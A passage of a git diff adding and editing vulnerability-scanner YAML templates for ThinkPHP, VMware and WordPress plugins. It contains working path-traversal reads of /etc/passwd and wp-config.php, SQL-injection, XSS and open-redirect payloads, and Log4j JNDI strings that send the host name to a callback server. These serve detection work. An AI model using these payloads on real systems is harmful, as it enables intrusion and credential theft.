../../../../../../../../../../../../../../../../windows/win.ini + unix-payload: ../../../../../../../../../../../../../../../../etc/passwd + tags: thinkcmf,lfi requests: - method: GET diff --git a/vulnerabilities/thinkcmf/thinkcmf-rce.yaml b/vulnerabilities/thinkcmf/thinkcmf-rce.yaml index b7dee6350d..cd53e288b5 100644 --- a/vulnerabilities/thinkcmf/thinkcmf-rce.yaml +++ b/vulnerabilities/thinkcmf/thinkcmf-rce.yaml @@ -4,7 +4,8 @@ info: name: ThinkCMF RCE author: pikpikcu severity: critical - reference: https://www.freebuf.com/vuls/217586.html + reference: + - https://www.freebuf.com/vuls/217586.html tags: thinkcmf,rce requests: diff --git a/vulnerabilities/thinkphp/thinkphp-2-rce.yaml b/vulnerabilities/thinkphp/thinkphp-2-rce.yaml index e48e8357e1..daac2251b9 100644 --- a/vulnerabilities/thinkphp/thinkphp-2-rce.yaml +++ b/vulnerabilities/thinkphp/thinkphp-2-rce.yaml @@ -1,5 +1,5 @@ id: thinkphp-2-rce - + info: name: ThinkPHP 2 / 3 's' Parameter RCE author: dr_set @@ -7,7 +7,7 @@ info: description: ThinkPHP 2.x version and 3.0 in Lite mode Remote Code Execution. reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/2-rce tags: thinkphp,rce - + requests: - method: GET path: diff --git a/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml b/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml index 605df4bb17..5d6b6a2362 100644 --- a/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml +++ b/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml @@ -1,5 +1,5 @@ id: thinkphp-5022-rce - + info: name: ThinkPHP 5.0.22 RCE author: dr_set @@ -7,7 +7,7 @@ info: description: Thinkphp5 5.0.22/5.1.29 Remote Code Execution if the website doesn't have mandatory routing enabled (which is default). reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5-rce tags: thinkphp,rce - + requests: - method: GET path: diff --git a/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml b/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml index 952c9ed7b9..1cda70e12f 100644 --- a/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml +++ b/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml @@ -1,5 +1,5 @@ id: thinkphp-5023-rce - + info: name: ThinkPHP 5.0.23 RCE author: dr_set @@ -7,7 +7,7 @@ info: description: Thinkphp5 5.0(<5.0.24) Remote Code Execution. reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5.0.23-rce tags: thinkphp,rce - + requests: - method: POST path: diff --git a/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml b/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml index fe3e3f715e..e1fd12a08d 100644 --- a/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml +++ b/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml @@ -1,26 +1,29 @@ -id: thinkphp-509-information-disclosure - -info: - name: ThinkPHP 5.0.9 Information Disclosure - author: dr_set - severity: critical - description: Verbose SQL error message reveals sensitive information including database credentials. - reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/in-sqlinjection - tags: thinkphp - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1" - - matchers-condition: and - matchers: - - type: word - condition: and - words: - - "SQLSTATE" - - "XPATH syntax error" - - - type: status - status: - - 500 +id: thinkphp-509-information-disclosure + +info: + name: ThinkPHP 5.0.9 - Information Disclosure + author: dr_set + severity: critical + description: ThinkPHP 5.0.9 includes verbose SQL error message that can reveal sensitive information including database credentials. + reference: + - https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/in-sqlinjection + tags: thinkphp + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1" + + matchers-condition: and + matchers: + - type: word + condition: and + words: + - "SQLSTATE" + - "XPATH syntax error" + + - type: status + status: + - 500 + +# Enhanced by mp on 2022/04/20 diff --git a/vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml b/vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml new file mode 100644 index 0000000000..ac05387a0c --- /dev/null +++ b/vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml @@ -0,0 +1,37 @@ +id: vmware-horizon-log4j-jndi-rce + +info: + name: VMware Horizon Log4j JNDI RCE + author: johnk3r + severity: high + description: A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in impacted VMware Horizon. + reference: + - https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis + - https://www.vmware.com/security/advisories/VMSA-2021-0028.html + tags: rce,jndi,log4j,horizon,vmware + +requests: + - raw: + - | + GET /portal/info.jsp HTTP/1.1 + Host: {{Hostname}} + Accept-Language: ${jndi:${lower:d}n${lower:s}://${env:hostName}.{{interactsh-url}}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + + extractors: + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output diff --git a/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml b/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml index 60b28b1a65..a6ab46dae7 100644 --- a/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml +++ b/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml @@ -4,7 +4,7 @@ info: name: Vmware Vcenter LFI for Linux appliances author: PR3R00T severity: high - tags: vmware,lfi + tags: vmware,lfi,vcenter requests: - method: GET @@ -13,4 +13,4 @@ requests: matchers: - type: word words: - - "vCenter Server" \ No newline at end of file + - "vCenter Server" diff --git a/vulnerabilities/vmware/vmware-vcenter-lfi.yaml b/vulnerabilities/vmware/vmware-vcenter-lfi.yaml index 9ee7ce40bb..53a04713d1 100644 --- a/vulnerabilities/vmware/vmware-vcenter-lfi.yaml +++ b/vulnerabilities/vmware/vmware-vcenter-lfi.yaml @@ -7,7 +7,7 @@ info: reference: - https://kb.vmware.com/s/article/7960893 - https://twitter.com/ptswarm/status/1316016337550938122 - tags: vmware,lfi + tags: vmware,lfi,vcenter requests: - raw: diff --git a/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml b/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml new file mode 100644 index 0000000000..b231e287be --- /dev/null +++ b/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml @@ -0,0 +1,38 @@ +id: vmware-vcenter-log4j-jndi-rce + +info: + name: VMware VCenter Log4j JNDI RCE + author: _0xf4n9x_ + severity: high + description: A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in impacted VMware VCenter. + reference: + - https://www.vmware.com/security/advisories/VMSA-2021-0028.html + - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q + - https://twitter.com/tnpitsecurity/status/1469429810216771589 + tags: rce,jndi,log4j,vcenter,vmware + +requests: + - raw: + - | + GET /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1 + Host: {{Hostname}} + X-Forwarded-For: ${jndi:${lower:d}n${lower:s}://${env:hostName}.{{interactsh-url}}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + + extractors: + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output \ No newline at end of file diff --git a/vulnerabilities/vmware/vmware-vcenter-ssrf.yaml b/vulnerabilities/vmware/vmware-vcenter-ssrf.yaml index a5c3a08d86..9ee9d70874 100644 --- a/vulnerabilities/vmware/vmware-vcenter-ssrf.yaml +++ b/vulnerabilities/vmware/vmware-vcenter-ssrf.yaml @@ -4,8 +4,9 @@ info: name: VMware vCenter SSRF/LFI/XSS author: pdteam severity: critical - reference: https://github.com/l0ggg/VMware_vCenter - tags: ssrf,lfi,xss,oast + reference: + - https://github.com/l0ggg/VMware_vCenter + tags: ssrf,lfi,xss,oast,vcenter,vmware requests: - method: GET diff --git a/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml b/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml new file mode 100644 index 0000000000..166fd6a2a0 --- /dev/null +++ b/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml @@ -0,0 +1,49 @@ +id: vrealize-operations-log4j-rce + +info: + name: VMware vRealize Operations Tenant App Log4j JNDI Remote Code Execution + author: bughuntersurya + severity: critical + description: VMware vRealize Operations is susceptible to a critical vulnerability in Apache Log4j which may allow remote code execution in an impacted vRealize Operations Tenant application. + reference: + - https://www.vmware.com/security/advisories/VMSA-2021-0028.html + - https://core.vmware.com/vmsa-2021-0028-questions-answers-faq + - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 + - https://nvd.nist.gov/vuln/detail/CVE-2021-45046 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + metadata: + shodan-query: http.title:"vRealize Operations Tenant App" + tags: rce,log4j,vmware,vrealize + +requests: + - raw: + - | + POST /suite-api/api/auth/token/acquire HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + Origin: {{RootURL}} + Referer: {{RootURL}}/ui/ + + {"username":"${jndi:ldap://${hostName}.{{interactsh-url}}}","password":"admin"} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" # Confirms the DNS Interaction + + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + + extractors: + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + +# Enhanced by mp on 2022/04/05 diff --git a/vulnerabilities/wordpress/accessibility-helper-xss.yaml b/vulnerabilities/wordpress/accessibility-helper-xss.yaml new file mode 100644 index 0000000000..e1b5a6ec3a --- /dev/null +++ b/vulnerabilities/wordpress/accessibility-helper-xss.yaml @@ -0,0 +1,31 @@ +id: accessibility-helper-xss + +info: + name: WP Accessibility Helper (WAH) < 0.6.0.7 - Reflected Cross-Site Scripting (XSS) + author: dhiyaneshDK + severity: medium + description: The plugin does not sanitise and escape the wahi parameter before outputting back its base64 decode value in the page, leading to a Reflected Cross-Site Scripting issue. + reference: + - https://wpscan.com/vulnerability/7142a538-7c3d-4dd0-bd2c-cbd2efaf53c5 + tags: xss,wordpress,wp-plugin,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "var wah_target_src = '';alert(document.domain);//';" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/admin-word-count-column-lfi.yaml b/vulnerabilities/wordpress/admin-word-count-column-lfi.yaml new file mode 100644 index 0000000000..fd86eaf40f --- /dev/null +++ b/vulnerabilities/wordpress/admin-word-count-column-lfi.yaml @@ -0,0 +1,25 @@ +id: admin-word-count-column-lfi + +info: + name: Admin word count column 2.2 - Arbitrary File Retrieval + author: daffainfo,Splint3r7 + severity: high + reference: + - https://packetstormsecurity.com/files/166476/WordPress-Admin-Word-Count-Column-2.2-Local-File-Inclusion.html + - https://wordpress.org/plugins/admin-word-count-column/ + tags: wordpress,wp-plugin,lfi,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0' + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/age-gate-open-redirect.yaml b/vulnerabilities/wordpress/age-gate-open-redirect.yaml new file mode 100644 index 0000000000..2c70de7696 --- /dev/null +++ b/vulnerabilities/wordpress/age-gate-open-redirect.yaml @@ -0,0 +1,29 @@ +id: age-gate-open-redirect + +info: + name: Age Gate < 2.13.5 - Unauthenticated Open Redirect + author: akincibor + severity: low + description: The plugin takes the _wp_http_referer parameter to redirect users after some actions as well as after invalid or missing nonces, leading to an Unauthenticated Open Redirect issue. + reference: + - https://wpscan.com/vulnerability/10489 + - https://packetstormsecurity.com/files/160236/ + - https://wordpress.org/plugins/age-gate + metadata: + verified: true + tags: wp-plugin,redirect,wordpress,wp,agegate,unauth + +requests: + - method: POST + path: + - '{{BaseURL}}/wp-admin/admin-post.php' + + body: age_gate%5Bd%5D=10&age_gate%5Bm%5D=10&age_gate%5By%5D=1990&age_gate%5Bremember%5D=1&age_gate%5Bage%5D=TVRnPQ%3D%3D&action=age_gate_submit&age_gate%5Bnonce%5D=48f2b89fed&_wp_http_referer=https://attacker.com + headers: + Content-Type: application/x-www-form-urlencoded + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/vulnerabilities/wordpress/alfacgiapi-wordpress.yaml b/vulnerabilities/wordpress/alfacgiapi-wordpress.yaml index 69b0d39f88..27d4456e69 100644 --- a/vulnerabilities/wordpress/alfacgiapi-wordpress.yaml +++ b/vulnerabilities/wordpress/alfacgiapi-wordpress.yaml @@ -1,4 +1,5 @@ id: alfacgiapi-wordpress + info: name: alfacgiapi author: pussycat0x @@ -6,6 +7,7 @@ info: description: Searches for sensitive directories present in the ALFA_DATA. reference: https://www.exploit-db.com/ghdb/6999 tags: wordpress,listing + requests: - method: GET path: diff --git a/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml b/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml new file mode 100644 index 0000000000..f9fc49bd56 --- /dev/null +++ b/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml @@ -0,0 +1,25 @@ +id: amministrazione-aperta-lfi + +info: + name: Amministrazione Aperta 3.7.3 - Unauthenticated Local File Read + author: daffainfo,Splint3r7 + severity: high + reference: + - https://www.exploit-db.com/exploits/50838 + - https://wordpress.org/plugins/amministrazione-aperta + tags: wordpress,wp-plugin,lfi,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd' + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/aspose-file-download.yaml b/vulnerabilities/wordpress/aspose-file-download.yaml index 78d4048c1b..2c4b91c5d4 100644 --- a/vulnerabilities/wordpress/aspose-file-download.yaml +++ b/vulnerabilities/wordpress/aspose-file-download.yaml @@ -1,12 +1,13 @@ id: aspose-file-download info: - name: Aspose Cloud eBook Generator - File Download + name: Wordpress Aspose Cloud eBook Generator - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: The Aspose Cloud eBook Generator WordPress plugin was affected by a File Download security vulnerability. - reference: https://wpscan.com/vulnerability/7866 - tags: wordpress,wp-plugin,lfi + description: The Aspose Cloud eBook Generator WordPress plugin is affected by an arbitrary file retrieval vulnerability. + reference: + - https://wpscan.com/vulnerability/7866 + tags: wordpress,wp-plugin,lfi,aspose,ebook requests: - method: GET diff --git a/vulnerabilities/wordpress/aspose-ie-file-download.yaml b/vulnerabilities/wordpress/aspose-ie-file-download.yaml index 095211f5e4..ae52c36233 100644 --- a/vulnerabilities/wordpress/aspose-ie-file-download.yaml +++ b/vulnerabilities/wordpress/aspose-ie-file-download.yaml @@ -1,10 +1,10 @@ id: aspose-ie-file-download info: - name: Wordpress Aspose Importer & Exporter v1.0 Plugin File Download + name: Wordpress Aspose Importer & Exporter v1.0 - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: The Aspose importer and Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability. + description: The Aspose importer and Exporter WordPress plugin is affected by an arbitrary file retrieval vulnerability. reference: - https://packetstormsecurity.com/files/131162/ - https://wordpress.org/plugins/aspose-importer-exporter diff --git a/vulnerabilities/wordpress/aspose-pdf-file-download.yaml b/vulnerabilities/wordpress/aspose-pdf-file-download.yaml index 338fb37c0d..48c499bc3a 100644 --- a/vulnerabilities/wordpress/aspose-pdf-file-download.yaml +++ b/vulnerabilities/wordpress/aspose-pdf-file-download.yaml @@ -1,10 +1,10 @@ id: aspose-pdf-file-download info: - name: WordPress Aspose PDF Exporter File Download + name: WordPress Aspose PDF Exporter - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: The Aspose.psf Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability. + description: The Aspose.psf Exporter WordPress plugin is affected by an arbitrary file retrieval vulnerability. reference: - https://packetstormsecurity.com/files/131161 - https://wordpress.org/plugins/aspose-pdf-exporter diff --git a/vulnerabilities/wordpress/aspose-words-file-download.yaml b/vulnerabilities/wordpress/aspose-words-file-download.yaml index 6cf04ee7eb..ac80fecb8c 100644 --- a/vulnerabilities/wordpress/aspose-words-file-download.yaml +++ b/vulnerabilities/wordpress/aspose-words-file-download.yaml @@ -1,14 +1,14 @@ id: aspose-words-file-download info: - name: Aspose Words Exporter < 2.0 - Unauthenticated Arbitrary File Download + name: Aspose Words Exporter < 2.0 - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: The Aspose.Words Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability. + description: The Aspose.Words Exporter WordPress plugin is affected by an arbitrary file retrieval security vulnerability. reference: - https://wpscan.com/vulnerability/7869 - https://wordpress.org/plugins/aspose-doc-exporter - tags: wordpress,wp-plugin,lfi + tags: wordpress,wp-plugin,lfi,aspose requests: - method: GET diff --git a/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml b/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml index 27dc936559..3dbd07b8b7 100644 --- a/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml +++ b/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml @@ -5,7 +5,8 @@ info: author: 0x_Akoko severity: low description: A vulnerability in WordPress Attitude Themes allows remote attackers to inject an arbitrary URL into the 'goto.php' endpoint which will redirect the victim to it. - reference: https://cxsecurity.com/issue/WLB-2020030185 + reference: + - https://cxsecurity.com/issue/WLB-2020030185 tags: wordpress,wp-theme,redirect requests: diff --git a/vulnerabilities/wordpress/brandfolder-open-redirect.yaml b/vulnerabilities/wordpress/brandfolder-open-redirect.yaml index ddc524d0fc..826c966731 100644 --- a/vulnerabilities/wordpress/brandfolder-open-redirect.yaml +++ b/vulnerabilities/wordpress/brandfolder-open-redirect.yaml @@ -5,7 +5,8 @@ info: author: 0x_Akoko severity: low description: A vulnerability in WordPress Brandfolder allows remote attackers to inject an arbitrary URL into the 'callback.php' endpoint via the 'wp_abspath' parameter which will redirect the victim to it. - reference: https://www.exploit-db.com/exploits/39591 + reference: + - https://www.exploit-db.com/exploits/39591 tags: wordpress,wp-plugin,lfi,rfi requests: diff --git a/vulnerabilities/wordpress/cab-fare-calculator-lfi.yaml b/vulnerabilities/wordpress/cab-fare-calculator-lfi.yaml new file mode 100644 index 0000000000..a668258b91 --- /dev/null +++ b/vulnerabilities/wordpress/cab-fare-calculator-lfi.yaml @@ -0,0 +1,25 @@ +id: cab-fare-calculator-lfi + +info: + name: Cab fare calculator 1.0.3 - Unauthenticated Local File Inclusion + author: Hassan Khan Yusufzai - Splint3r7 + severity: high + reference: + - https://www.exploit-db.com/exploits/50843 + - https://wordpress.org/plugins/cab-fare-calculator + tags: wordpress,wp-plugin,lfi,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1' + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/candidate-application-lfi.yaml b/vulnerabilities/wordpress/candidate-application-lfi.yaml new file mode 100644 index 0000000000..cdc97aa53a --- /dev/null +++ b/vulnerabilities/wordpress/candidate-application-lfi.yaml @@ -0,0 +1,31 @@ +id: candidate-application-lfi + +info: + name: WordPress Candidate Application Form <= 1.3 - Local File Inclusion + author: dhiyaneshDK + severity: high + description: WordPress Candidate Application Form <= 1.3 is susceptible to arbitrary file downloads because the code in downloadpdffile.php does not do any sanity checks. + reference: + - https://wpscan.com/vulnerability/446233e9-33b3-4024-9b7d-63f9bb1dafe0 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cwe-id: CWE-22 + tags: wordpress,wp-plugin,lfi,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd' + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/21 diff --git a/vulnerabilities/wordpress/cherry-file-download.yaml b/vulnerabilities/wordpress/cherry-file-download.yaml index 3597e4d780..8ebd3cd3c1 100644 --- a/vulnerabilities/wordpress/cherry-file-download.yaml +++ b/vulnerabilities/wordpress/cherry-file-download.yaml @@ -1,13 +1,17 @@ id: cherry-file-download info: - name: Cherry Plugin < 1.2.7 - Unauthenticated Arbitrary File Download + name: Cherry Plugin < 1.2.7 - Arbitrary File Retrieval and File Upload author: 0x_Akoko severity: high - description: The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file. + description: WordPress plugin Cherry < 1.2.7 contains an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file. reference: - https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee - https://github.com/CherryFramework/cherry-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cwe-id: CWE-22 tags: wordpress,wp-plugin,lfi requests: @@ -27,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/21 diff --git a/vulnerabilities/wordpress/cherry-lfi.yaml b/vulnerabilities/wordpress/cherry-lfi.yaml new file mode 100644 index 0000000000..b0b6c0a44f --- /dev/null +++ b/vulnerabilities/wordpress/cherry-lfi.yaml @@ -0,0 +1,36 @@ +id: cherry-lfi + +info: + name: WordPress Cherry < 1.2.7 - Unauthenticated Arbitrary File Upload and Download + author: dhiyaneshDK + severity: high + description: WordPress plugin Cherry < 1.2.7 has a vulnerability which enables an attacker to upload files directly to the server. This could result in attacker uploading backdoor shell scripts or downloading the + wp-config.php file. + reference: + - https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee + - https://support.alertlogic.com/hc/en-us/articles/115003048083-06-19-17-WordPress-CMS-Cherry-Plugin-Arbitrary-File-Upload-RCE + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cwe-id: CWE-22 + tags: wordpress,wp-plugin,lfi,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/21 diff --git a/vulnerabilities/wordpress/churchope-lfi.yaml b/vulnerabilities/wordpress/churchope-lfi.yaml new file mode 100644 index 0000000000..a0f1465b83 --- /dev/null +++ b/vulnerabilities/wordpress/churchope-lfi.yaml @@ -0,0 +1,32 @@ +id: churchope-lfi + +info: + name: WordPress ChurcHope Theme <= 2.1 - Local File Inclusion + author: dhiyaneshDK + severity: high + description: WordPress ChurcHope Theme <= 2.1 is susceptible to local file inclusion. The vulnerability is caused by improper filtration of user-supplied input passed via the 'file' HTTP GET parameter to the '/lib/downloadlink.php' script, which is publicly accessible. + reference: + - https://wpscan.com/vulnerability/3c5833bd-1fe0-4eba-97aa-7d3a0c8fda15 + classification: + cwe-id: CWE-22 + tags: wordpress,wp-theme,lfi,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/12 diff --git a/vulnerabilities/wordpress/db-backup-lfi.yaml b/vulnerabilities/wordpress/db-backup-lfi.yaml new file mode 100644 index 0000000000..48dcb57edf --- /dev/null +++ b/vulnerabilities/wordpress/db-backup-lfi.yaml @@ -0,0 +1,30 @@ +id: db-backup-lfi + +info: + name: DB Backup <= 4.5 - Path Traversal File Access + author: dhiyaneshDK + severity: high + description: WordPress Plugin DB Backup is prone to a directory traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive + information that could aid in further attacks. WordPress Plugin DB Backup version 4.5 is vulnerable; prior versions may also be affected. + reference: + - https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536 + - https://www.exploit-db.com/exploits/35378 + tags: wordpress,wp-plugin,lfi,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + condition: and + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/diarise-theme-lfi.yaml b/vulnerabilities/wordpress/diarise-theme-lfi.yaml index ac34aa0c88..366df9bb91 100644 --- a/vulnerabilities/wordpress/diarise-theme-lfi.yaml +++ b/vulnerabilities/wordpress/diarise-theme-lfi.yaml @@ -1,12 +1,16 @@ id: diarise-theme-lfi + info: - name: WordPress Diarise 1.5.9 Local File Disclosure + name: WordPress Diarise 1.5.9 - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: WordPress Diarise theme version 1.5.9 suffers from a local file disclosure vulnerability. + description: WordPress Diarise theme version 1.5.9 suffers from a local file retrieval vulnerability. reference: - https://packetstormsecurity.com/files/152773/WordPress-Diarise-1.5.9-Local-File-Disclosure.html - https://cxsecurity.com/issue/WLB-2019050123 + - https://woocommerce.com/?aff=1790 + classification: + cwe-id: CWE-98 tags: wordpress,wp-theme,lfi requests: @@ -24,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/05 diff --git a/vulnerabilities/wordpress/dzs-zoomsounds-listing.yaml b/vulnerabilities/wordpress/dzs-zoomsounds-listing.yaml new file mode 100644 index 0000000000..f83ef7300e --- /dev/null +++ b/vulnerabilities/wordpress/dzs-zoomsounds-listing.yaml @@ -0,0 +1,25 @@ +id: dzs-zoomsounds-listing + +info: + name: WordPress Plugin dzs zoomsounds + author: pussycat0x + severity: info + description: Searches for sensitive directories present in the wordpress-plugins plugin. + tags: wordpress,listing,wp-plugin,wp + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/dzs-zoomsounds/" + + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - "/wp-content/plugins/dzs-zoomsounds" + condition: and + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/easy-media-gallery-pro-listing.yaml b/vulnerabilities/wordpress/easy-media-gallery-pro-listing.yaml index 84f714c999..de7c8f2d98 100644 --- a/vulnerabilities/wordpress/easy-media-gallery-pro-listing.yaml +++ b/vulnerabilities/wordpress/easy-media-gallery-pro-listing.yaml @@ -1,4 +1,5 @@ id: easy-media-gallery-pro-listing + info: name: WordPress Plugin Media Gallery Pro Listing author: pussycat0x @@ -6,7 +7,7 @@ info: description: Searches for sensitive directories present in the wordpress-plugins plugin. reference: https://www.exploit-db.com/ghdb/6455 tags: wordpress,listing,wp-plugin - + requests: - method: GET path: diff --git a/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml b/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml deleted file mode 100644 index 6225458a19..0000000000 --- a/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: easy-wp-smtp-listing - -info: - name: SMTP WP Plugin Directory listing enabled - author: PR3R00T - severity: high - description: The WordPress Easy WP SMTP Plugin has its 'easy-wp-smtp' folder remotely acccessible and its content available for access. - reference: https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/ - tags: wordpress,wp-plugin - -requests: - - 